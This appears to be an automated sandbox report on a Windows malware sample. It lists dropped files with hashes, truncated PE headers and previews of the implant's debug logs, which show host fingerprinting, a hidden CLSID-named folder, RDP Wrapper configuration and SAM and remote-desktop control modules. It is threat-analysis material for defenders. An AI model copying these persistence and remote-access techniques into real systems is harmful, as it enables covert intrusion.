Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe
File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):89088
Entropy (8bit):6.229509810228039
Encrypted:false
SSDEEP:1536:uICj06A88ADD9QIlXlQhnJqI1I5npfinMC0eH:xCj06A8J1/sJa5pfinMC0e
MD5:4E320E2F46342D6D4657D2ADBF1F22D0
SHA1:A5ACFE6397DFFC61D243206885C389EA05428755
SHA-256:7D4A26158F41DE0BFD7E76D99A474785957A67F7B53EE8AD376D69ABC6E33CC8
SHA-512:E8E044FD17B36D188BB5EE8E5F7BFC9AECC01AB17E954D6996B900BC60D6D57AFD782C7E01DF7CC76A84E04CE16F77FE882F2D86E5113F25C1C3D385CFAE37A5
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....X.................@....................................\.....`... .................................................P............`..X...........................................`B..(....................................................text...............................`..`.data...............................@....rdata...P.......R..................@..@.pdata..X....`.......0..............@..@.xdata.......p.......:..............@..@.bss....P................................idata..P............D..............@....CRT....`............V..............@....tls.................X..............@....reloc...............Z..............@..B................................................................................................................................................................................................................
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):12926
Entropy (8bit):5.586944793893784
Encrypted:false
SSDEEP:192:AziT20tApp20y8YQDdgd87CsXZP8uTZsaE8AWf3qL89FyGEW8HpU6my8FOPLrz8q:siTZ1ZWN8Yanuv2X0rnC
MD5:2523E711F531B27E900FCDE5FA84CAC6
SHA1:04E5962B614676995577F5BC0222BF91A09060DA
SHA-256:3B2A0318CE8CE71316E84AB2BA786465DBE21893E3163609B211B9446CBB303D
SHA-512:90D20B6B3BB5875F5135F7401DF1798E31EED9C9CFCE970E4B90711F0B195C1329C4F6DABC4709DFF4CBA43E6ED9649C0303B273DFB6362F3A62A5D7F19EB2D9
Malicious:false
Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=7c6630a8)..[I] (sys_init) -> Done(sys_uid=c76a8f087c6630a8,sys_os_ver=10.0.19045.0.0)..[I] (fs_file_read) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkg,buf_sz=10451376)..[I] (fs_path_expand) -> Done(path=%TEMP%,xpath=C:\Windows\TEMP,xpath_sz=15)..[I] (fs_path_temp) -> Done(path=C:\Windows\TEMP\zFE1sfMY,path
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):105984
Entropy (8bit):6.2884725801282775
Encrypted:false
SSDEEP:1536:wPwNKEKbLqYQtCwCxJtpyYNPvo3cxwNn6anP8XOCYA8CSs8qgu06wCYA8CSs8qgm:gwnKvqTaxJtpRP7wNbnP8Xf
MD5:91A0DD29773FBFB7112C5FCFF1873C13
SHA1:E1EAF1EFB134CAA7DA5AAA362830A68AB705C023
SHA-256:AE2D023EBBFEEFD5A26EAA255AD3862C9A1C276BB0B46FF88EA9A9999406D6B6
SHA-512:F7A665A218BB2CCEC32326B0E0A9845B2981F17445B5CB54BBA7D6EF9E200B4538EBD19916C2DACB0BBE1B409C14A499B23BA707874AE1F1B154279C90DC33DD
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................@......K.....`... .........................................^.......................T............0..h...............................(.......................`............................text...X...........................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss....@................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):785063
Entropy (8bit):5.008439650882246
Encrypted:false
SSDEEP:192:AONiTn0+555555555555555555o5o55555555555555555555555o5555555555w:NNiTj9
MD5:298F3DC04CB4A8321971C1509875F670
SHA1:D2E762C6F7BA0ED6FD0E581E6D65D456A5269C82
SHA-256:3880D4456108675D7AAA2D8503C243161154C1D8E4A74B5DEB2C732FBB7FCA04
SHA-512:F561EF7ECEB62529F89015AB71C46F94180459BD29437D1A6BD7DA8EDFA6077D94A63B25F6EBB8E4A569D556E4D863DD0A1B3CEE3D5FF77A9155413175DAD62F
Malicious:false
Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=7c6630a8)..[I] (sys_init) -> Done(sys_uid=c76a8f087c6630a8,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe0eb49d36)..[I] (tcp_connect) -> Done(sock=0x384,host=7
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):129024
Entropy (8bit):6.313152038164236
Encrypted:false
SSDEEP:3072:Ex6tEkLvf8H5KRjus59IoZzhoesVR8ssT/nv:mEJ5qoZzfTX
MD5:C89542ABA45CE1084760AE8DE6EAE09E
SHA1:603560A3E4B6A8CB906CA98C907373ADBF4D3B1C
SHA-256:1B6E559DC0CB37EBB2311C7CBF01B039F0DC1C3EC6DA057837451A531B1E2CB0
SHA-512:60A0EB698AFE25CDDDB133FC937FEE478F1E0F8AF72B825C19BB2D544FAFCC217BABF6DD3D01704A106677E92AAE3DD57538E34731C950DA17F5715DF0732FF6
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.:..........\.........,.....................................,j....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text...(9.......:..................`..`.data........P.......>..............@....rdata.......`.......@..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):221031
Entropy (8bit):5.334054794702459
Encrypted:false
SSDEEP:192:A+NiTtPPPPPPPPPPPPPPPPPPPPPPPIPPPPPPPPPPIPIIPPPPPPPPZPPPPPPPPPCy:ZNiTW
MD5:C4602D8AE2C402FF7B1F016FA6B02F48
SHA1:A42FA24CFADC4B610924F865FB776D6986777DD5
SHA-256:46247C631180AAE8A379CB7C893E7FCED220C7B6FDA78E08D30A6CE3D25C74BE
SHA-512:AD75351DACFCECAF991FAD3DA2F74219E2F4A809799DD0A588DEA90354F6A10D1EE79507C6A08BE4E100F5DA873BDFDB37301763AE1944AEFA82B44C425E941D
Malicious:false
Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=7c6630a8)..[I] (sys_init) -> Done(sys_uid=c76a8f087c6630a8,sys_os_ver=10.0.19045.0.0)..[I] (scm_init) -> Done..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (proxy_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe0e16
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):37376
Entropy (8bit):5.7181012847214445
Encrypted:false
SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
MD5:E3E4492E2C871F65B5CEA8F1A14164E2
SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
Malicious:false
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):115712
Entropy (8bit):6.277217301921545
Encrypted:false
SSDEEP:1536:UsmIeUIfJAH791hpVMjqZm4S53kp21ahrvffvTn+33333333333333333333333L:I5fJAHZ1Kj7hkUYr3TlX8Y/biF
MD5:D0F0423AEEE6B6FF6754D860603D46D0
SHA1:A06F3B9605B3398BA68154DA39ADF26DDEE41743
SHA-256:81DA68F52DF2ED997C374CCBEFC56849650770FB30EDA8F202BBC7FC3FE6A51D
SHA-512:C30FAEDE4520FF1C859B8B39E351112CFC60DAECA98B1359F9F86AB79BCFB996BA84F35A5B178B4ABEC66152864720E58F741AE13D06B64913E240A1F9E6A633
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................P............`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):653185
Entropy (8bit):5.287695797725974
Encrypted:false
SSDEEP:192:ARNiTfjjjjjjjjjjjjjjjIjjjDjnjIjjjjjjjjjjfjIIjjjjjjjjhjjjjjjjjGjI:uNiT7N
MD5:D9955005AE81DC1B8767BE466899C5F6
SHA1:169F28356645623E3C57BB3280F27BD102F2D165
SHA-256:AEA05245B46707E46E7EBF001C229265332BCB3E3A7BA12A03F8D350C7AF4F3A
SHA-512:9B72C4AEBB85B4B5C0B2861163D76A98D3B37D3CB0D3E7B0CF0836C7DF2785E6BD84F27CF41F93D579818D4DD14DD8FC6F68283D43E13D3A786AB0A32FFB9F77
Malicious:false
Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=7c6630a8)..[I] (sys_init) -> Done(sys_uid=c76a8f087c6630a8,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (sam_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe0e13e1cc)..[I] (tcp_connect) -
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):91136
Entropy (8bit):6.2290767543196575
Encrypted:false
SSDEEP:1536:/PvW2FSiFAp7A1VBYj6PemyulDw02PijNFnRbPEMBI:/nW6SiFAp7A1VBYj6Pemyu1F2IFRbcM+
MD5:4C086C8F48C4D0F8C20410E60340AEC9
SHA1:77481360A98F3018F92A57B66E1DC7A6EC0DD0E8
SHA-256:0A8FCB54DF736100F5792B6CE57AE165553712CB1E5701E4E0DD7620E6089F59
SHA-512:CDBCC2FD4195A6FA5A343234A745E3E7A558F68A496D376FDF6A86D585C9FA39A64F0CEB20A2D2E6E30E59BA46F62493E500D6EEB033FA981DAA60F00EE42F14
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....`......\...............................................R.....`... ..............................................................`..................d............................I..(......................h............................text...............................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:Generic INItialization configuration [SLPolicy]
Category:dropped
Size (bytes):441513
Entropy (8bit):5.449545529389614
Encrypted:false
SSDEEP:768:yUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7N:eJGYB33L+MUIiG4IvREWddadl/Fy/k9u
MD5:5FCB4B6362E04A8D1C6ECD33AD246FB9
SHA1:E198D3E81C4B8527451133BCEAFA799D2115A8BB
SHA-256:060EE1BCB5817709F2D73BB1762C5ABCA09FAF5271E8F90503A84F9657ECDCD9
SHA-512:B5839D79D1A34DA86BA9B34A9105F7CC05E642C99D84D55E3E88833544DCE9FDD840F7ABF0F09CD4470734F24CA7C600C3C64E4041A4481806590D3B7A6A032D
Malicious:false
Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-08-21..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
Process:C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe
File Type:data
Category:dropped
Size (bytes):10451376
Entropy (8bit):6.708065758846917
Encrypted:false
SSDEEP:196608:diRu5DnWLX6Cs3E1CPwDvt3uF8c339CMEhB:diRsCKCsU1CPwDvt3uFd9CMEX
MD5:312704A6232D74733DE04C6E00F8CF21
SHA1:2B4820AC82C5B851464D6563FA6EA0CB3E3629C2
SHA-256:8D11890F2B70BA2ABB4B017B05F3BB1D20ECA6AD3EB84F0251E0857C77682C9B
SHA-512:5C32B9A8267C57CE640E7612BDECD7D7EC67F4E0AB48DD97A53373D220765AB234BC28779F524E788E1E03D8857CCD7755A22F19E1A34AE36FD6F33444016F01
Malicious:false
Preview:_W&T....cnccli.dll.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B.....................................................................................................................................................
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:modified
Size (bytes):64
Entropy (8bit):0.34726597513537405
Encrypted:false
SSDEEP:3:Nlll:Nll
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:false
Preview:@...e...........................................................
Process:C:\Users\user\Desktop\file.exe
File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):98304
Entropy (8bit):6.298274541598319
Encrypted:false
SSDEEP:1536:EJm0mRQUtrg7DYy+F2aQuuvL7V0Y91n1ot:EJmjSUtMiF2suvVr11ot
MD5:319865D78CC8DF6270E27521B8182BFF
SHA1:716E70B00AA2D154367028DE896C7D76C9D24350
SHA-256:A78945E7532ECDB29B9448A1F3EEF2F45EC2F01CA070B9868258CBCD31EAC23F
SHA-512:78CD48C8BA558DFFC204A70DBFF13889984F80F268A715FEC7FC018A7718A11822975F775D44A927C5815AA2CCC0D78502264354BF5D8C0502B5A0A323948611
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....|.................@....................................#7....`... ..............................................................................................................a..(....................... ............................text...............................`..`.data...............................@....rdata...R... ...T..................@..@.pdata...............R..............@..@.xdata...............\..............@..@.bss....0................................idata...............f..............@....CRT....`............z..............@....tls.................|..............@....reloc...............~..............@..B................................................................................................................................................................................................................
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
